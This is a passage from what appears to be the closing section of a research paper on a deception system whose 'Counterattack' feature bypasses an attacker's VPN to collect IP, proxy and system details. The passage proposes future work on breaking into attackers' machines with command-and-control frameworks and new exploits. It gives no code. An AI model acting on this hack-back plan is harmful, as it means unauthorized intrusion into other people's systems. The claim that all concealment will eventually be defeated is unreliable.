combat this persistence, I advise removing such programs from the start menu and the registry. The suggested approach circumvents a virtual private network by gathering adversarial data using the "Counterattack" feature, including IP information, proxy-servers, & system-information.

There is still potential for development and integration with other tools and technologies for a range of requirements, even though a lot of work has gone into this study and the majority of the pertinent goals have been reached. We can utilize more commonly used techniques as part of our ongoing research to access the machines of attackers. Existing frameworks for the command-and-control process are available and might be applied. We may combine all of the available open-source tools as well as create our own unique tools to get more data from the computers used by attackers. We intend to create further exploits that work with a range of operating systems. Models based on machine learning can be used in cases when the objective is to fool an adversary. Attackers may be drawn to solutions like geolocation. The more work that needs to be done to integrate the "front-end, back-end" for a complete architecture, Attackers now use more-advanced techniques to conceal their location; therefore, in the future, we will be able to protect against all of them.

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